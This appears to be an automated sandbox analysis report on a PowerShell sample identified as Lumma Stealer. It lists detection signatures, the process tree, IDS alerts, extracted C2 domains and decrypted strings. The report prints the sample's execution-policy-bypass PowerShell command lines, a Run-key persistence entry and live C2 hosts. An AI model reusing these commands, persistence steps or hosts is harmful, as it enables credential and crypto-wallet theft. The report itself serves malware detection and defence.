Windows Analysis Report
xaSPJNbl.ps1

Overview

General Information

Sample name:xaSPJNbl.ps1
Analysis ID:1558794
MD5:b1c4cb0479a434c478b9e5e38cc42fe0
SHA1:ad45a2bccacb5ae981358cba37260ca3fe4e1e24
SHA256:a4063200b38b2a71b1f70d11a73828ebaadd0db2044cc3fcdc29aabb17341224

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Submitted sample is a known malware sample
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • powershell.exe (PID: 5900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xaSPJNbl.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 1736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Setup.exe (PID: 348 cmdline: "C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe" MD5: AD2735F096925010A53450CB4178C89E)
      • more.com (PID: 4864 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
        • conhost.exe (PID: 3160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • msiexec.exe (PID: 6840 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 9D09DC1EDA745A5F87553048E57620CF)
          • powershell.exe (PID: 4152 cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\2NTZ8H8AG941JFZKJESP7NAC.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 2968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Setup.exe (PID: 4260 cmdline: "C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe" MD5: AD2735F096925010A53450CB4178C89E)
    • more.com (PID: 4028 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
      • conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 1548 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • Setup.exe (PID: 6364 cmdline: "C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe" MD5: AD2735F096925010A53450CB4178C89E)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["processhol.sbs", "p3ar11fter.sbs", "peepburry828.sbs", "p10tgrace.sbs", "3xp3cts1aim.sbs", "5ptit5tuded.cyou"]}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\madHcNet32.dll | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
C:\Users\user\AppData\Roaming\zcZPHzDH\x64\rtl120.bpl | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\mvrSettings32.dll | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
0000000A.00000003.2132155751.0000000000766000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000A.00000003.2090035846.0000000000763000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000A.00000003.2119251555.0000000000765000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000A.00000003.2121215580.0000000000766000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000A.00000003.2055763748.0000000000765000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

                    System Summary

                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\2NTZ8H8AG941JFZKJESP7NAC.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\2NTZ8H8AG941JFZKJESP7NAC.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SysWOW64\msiexec.exe, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6840, ParentProcessName: msiexec.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\2NTZ8H8AG941JFZKJESP7NAC.ps1", ProcessId: 4152, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\2NTZ8H8AG941JFZKJESP7NAC.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\2NTZ8H8AG941JFZKJESP7NAC.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SysWOW64\msiexec.exe, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6840, ParentProcessName: msiexec.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\2NTZ8H8AG941JFZKJESP7NAC.ps1", ProcessId: 4152, ProcessName: powershell.exe
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xaSPJNbl.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xaSPJNbl.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xaSPJNbl.ps1", ProcessId: 5900, ProcessName: powershell.exe
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5900, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetUtilityApp
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6840, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49709
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5900, TargetFilename: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-processthreads-l1-1-1.dll
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xaSPJNbl.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xaSPJNbl.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xaSPJNbl.ps1", ProcessId: 5900, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-19T20:06:24.186580+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49709 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:26.831577+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49710 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:30.348718+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49712 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:31.592852+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49713 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:34.731965+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49714 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:36.510272+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49715 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:37.872566+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49716 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:40.548988+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49717 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:41.473361+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49718 | 172.67.75.40 | 443 | TCP
2024-11-19T20:06:24.636452+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49709 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:27.534872+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:40.963062+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49717 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:24.636452+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49709 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:27.534872+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:36.881578+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49715 | 188.114.97.3 | 443 | TCP

                    AV Detection

                    Source: https://5ptit5tuded.cyou/api, Avira URL Cloud: Label: malware
                    Source: 14.2.msiexec.exe.640000.0.unpack, Malware Configuration Extractor: LummaC {"C2 url": ["processhol.sbs", "p3ar11fter.sbs", "peepburry828.sbs", "p10tgrace.sbs", "3xp3cts1aim.sbs", "5ptit5tuded.cyou"]}
                    Source: C:\Users\user\AppData\Local\Temp\accpl, ReversingLabs: Detection: 50%
                    Source: C:\Users\user\AppData\Local\Temp\ktb, ReversingLabs: Detection: 50%
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\LiteSkinUtils.dll, ReversingLabs: Detection: 79%
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\mvrSettings32.dll, ReversingLabs: Detection: 65%
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\vcl120.bpl, ReversingLabs: Detection: 47%
                    Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Local\Temp\accpl, Joe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\ktb, Joe Sandbox ML: detected
                    Source: 0000000A.00000002.2205973170.00000000008E2000.00000002.00000001.01000000.00000000.sdmp, String decryptor: p3ar11fter.sbs
                    Source: 0000000A.00000002.2205973170.00000000008E2000.00000002.00000001.01000000.00000000.sdmp, String decryptor: 3xp3cts1aim.sbs
                    Source: 0000000A.00000002.2205973170.00000000008E2000.00000002.00000001.01000000.00000000.sdmp, String decryptor: peepburry828.sbs
                    Source: 0000000A.00000002.2205973170.00000000008E2000.00000002.00000001.01000000.00000000.sdmp, String decryptor: p10tgrace.sbs
                    Source: 0000000A.00000002.2205973170.00000000008E2000.00000002.00000001.01000000.00000000.sdmp, String decryptor: processhol.sbs
                    Source: 0000000A.00000002.2205973170.00000000008E2000.00000002.00000001.01000000.00000000.sdmp, String decryptor: 5ptit5tuded.cyou
                    Source: 0000000A.00000002.2205973170.00000000008E2000.00000002.00000001.01000000.00000000.sdmp, String decryptor: lid=%s&j=%s&ver=4.0
                    Source: 0000000A.00000002.2205973170.00000000008E2000.00000002.00000001.01000000.00000000.sdmp, String decryptor: TeslaBrowser/5.5
                    Source: 0000000A.00000002.2205973170.00000000008E2000.00000002.00000001.01000000.00000000.sdmp, String decryptor: - Screen Resoluton:
                    Source: 0000000A.00000002.2205973170.00000000008E2000.00000002.00000001.01000000.00000000.sdmp, String decryptor: - Physical Installed Memory:
                    Source: 0000000A.00000002.2205973170.00000000008E2000.00000002.00000001.01000000.00000000.sdmp, String decryptor: Workgroup: -
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA19E8150 ??0QString@@QEAA@XZ,??0QString@@QEAA@XZ,??0QString@@QEAA@XZ,?shared_null@QHashData@@2U1@B,??0QString@@QEAA@XZ,??0QString@@QEAA@XZ,??0QString@@QEAA@XZ,??0QString@@QEAA@XZ,??0QString@@QEAA@XZ,?system@QRandomGenerator64@@SAPEAV1@XZ,?_fillRange@QRandomGenerator@@AEAAXPEAX0@Z,?number@QByteArray@@SA?AV1@_KH@Z,?hash@QCryptographicHash@@SA?AVQByteArray@@AEBV2@W4Algorithm@1@@Z,?toHex@QByteArray@@QEBA?AV1@XZ,??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z,??1QByteArray@@QEAA@XZ,??1QByteArray@@QEAA@XZ,??1QByteArray@@QEAA@XZ,4_2_00007FFBA19E8150
                    Source: Setup.exe, 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_be6f7231-6
                    Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49709 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49710 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49712 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49713 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49714 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49715 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49716 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49717 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 172.67.75.40:443 -> 192.168.2.8:49718 version: TLS 1.2
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: Setup.exe, 00000004.00000003.1903835083.0000029C04643000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.2044770209.00007FFBA9C86000.00000002.00000001.01000000.0000000C.sdmp, Setup.exe, 00000007.00000002.2085414094.00007FFBA9C86000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdbGCTL source: Setup.exe, 00000004.00000003.1903835083.0000029C04643000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.2044770209.00007FFBA9C86000.00000002.00000001.01000000.0000000C.sdmp, Setup.exe, 00000007.00000002.2085414094.00007FFBA9C86000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 1.1.1s 1 Nov 2022built on: Fri Feb 3 01:12:04 2023 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "D:\juno\p4\desktop\packages\openSSL\1.1.1s\installed\dist\pc64_dll_release\lib\engines-1_1"not available source: Setup.exe, 00000004.00000002.1996466657.00007FFBA1C93000.00000002.00000001.01000000.0000000E.sdmp, Setup.exe, 00000007.00000002.2062596450.00007FFBA1C93000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: d:\Develop\dev-Milky\libs\mfclibs\ICQSkinUtils\ICQSkinUtils\_dmt\LiteSkinUtils.pdbWW source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdb source: Setup.exe, 00000004.00000002.2052868230.00007FFBBCF53000.00000002.00000001.01000000.00000011.sdmp, Setup.exe, 00000007.00000002.2086323457.00007FFBBCF53000.00000002.00000001.01000000.00000011.sdmp
                    Source: Binary string: wntdll.pdbUGP source: more.com, 00000008.00000002.2013062507.00000000048A0000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013369968.0000000004D10000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\juno\p4\desktop\packages\openSSL\1.1.1s\installed\source\libcrypto-1_1-x64.pdb source: Setup.exe, 00000004.00000002.1996466657.00007FFBA1D15000.00000002.00000001.01000000.0000000E.sdmp, Setup.exe, 00000004.00000003.1903329765.0000029C04687000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2062596450.00007FFBA1D15000.00000002.00000001.01000000.0000000E.sdmp, Setup.exe, 00000007.00000003.1994011222.000002563DEF0000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdbUGP source: Setup.exe, 00000004.00000002.1945495653.0000029C06FA0000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.1942306525.0000029C06BA2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.1957372633.0000029C071AD000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2018428447.0000025640912000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013762787.000002564031E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013949015.0000025640710000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdbGCTL source: Setup.exe, 00000004.00000002.2052868230.00007FFBBCF53000.00000002.00000001.01000000.00000011.sdmp, Setup.exe, 00000007.00000002.2086323457.00007FFBBCF53000.00000002.00000001.01000000.00000011.sdmp
                    Source: Binary string: wntdll.pdb source: more.com, 00000008.00000002.2013062507.00000000048A0000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013369968.0000000004D10000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: Q:\build\qt\qtbase\lib\Qt5Core.pdb source: Setup.exe, 00000004.00000002.2020848996.00007FFBA223C000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000007.00000002.2078219554.00007FFBA223C000.00000002.00000001.01000000.0000000A.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: Setup.exe, 00000004.00000002.2050358782.00007FFBBB741000.00000002.00000001.01000000.0000000D.sdmp, Setup.exe, 00000007.00000002.2086102566.00007FFBBB741000.00000002.00000001.01000000.0000000D.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: Setup.exe, 00000004.00000002.2050358782.00007FFBBB741000.00000002.00000001.01000000.0000000D.sdmp, Setup.exe, 00000007.00000002.2086102566.00007FFBBB741000.00000002.00000001.01000000.0000000D.sdmp
                    Source: Binary string: C:\Develop\dev-Milky\apps\ICQBasic\MIBResources\MIBResources\Eng\_dmt\LiteRes.pdbete All MessagesKAre you sure that you want to permanently delete all history for this user?!Delete: All history for this user=Are you sure that you want to permanently delete all history? source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: FatalErrorWarningDebugassert.report.fatalassert.report.errorassert.report.warningassert.report.debugassert.report.unknownasserts already initializedeax::foundation::initAssertionssAssertFailureFn == nullptr.pdb source: Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: D:\Projects\WinRAR\rar\build\unrardll32\Release\UnRAR.pdb source: powershell.exe, 00000001.00000002.1820039658.00000198B9E84000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Develop\dev-Milky\apps\ICQBasic\MIBResources\MIBResources\Eng\_dmt\LiteRes.pdb source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: Setup.exe, 00000004.00000002.2055448652.00007FFBC3145000.00000002.00000001.01000000.00000012.sdmp, Setup.exe, 00000007.00000002.2086516653.00007FFBC3145000.00000002.00000001.01000000.00000012.sdmp
                    Source: Binary string: .pdb.map.___> => > source: Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: Setup.exe, 00000004.00000002.1996466657.00007FFBA1C93000.00000002.00000001.01000000.0000000E.sdmp, Setup.exe, 00000007.00000002.2062596450.00007FFBA1C93000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: D:\juno\p4\desktop\packages\openSSL\1.1.1s\installed\source\libssl-1_1-x64.pdb source: Setup.exe, 00000004.00000002.2039104912.00007FFBA9BF4000.00000002.00000001.01000000.00000010.sdmp, Setup.exe, 00000004.00000003.1903329765.0000029C04643000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2084518585.00007FFBA9BF4000.00000002.00000001.01000000.00000010.sdmp
                    Source: Binary string: ntdll.pdb source: Setup.exe, 00000004.00000002.1945495653.0000029C06FA0000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.1942306525.0000029C06BA2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.1957372633.0000029C071AD000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2018428447.0000025640912000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013762787.000002564031E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013949015.0000025640710000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: Q:\build\qt\qtbase\lib\Qt5Network.pdb source: Setup.exe, 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp, Setup.exe, 00000007.00000002.2050033866.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: C:\jenkins\workspace\dev\juno-win_live\build\eaSteamProxy\pc64-vc-tool-opt\bin\EASteamProxy.pdb source: Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: d:\Develop\dev-Milky\libs\mfclibs\ICQSkinUtils\ICQSkinUtils\_dmt\LiteSkinUtils.pdb source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\jenkins\workspace\dev\juno-win_live\build\eaSteamProxy\pc64-vc-tool-opt\bin\EASteamProxy.pdbc source: Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: D:\juno\p4\desktop\packages\openSSL\1.1.1s\installed\source\libssl-1_1-x64.pdb?? source: Setup.exe, 00000004.00000002.2039104912.00007FFBA9BF4000.00000002.00000001.01000000.00000010.sdmp, Setup.exe, 00000004.00000003.1903329765.0000029C04643000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2084518585.00007FFBA9BF4000.00000002.00000001.01000000.00000010.sdmp
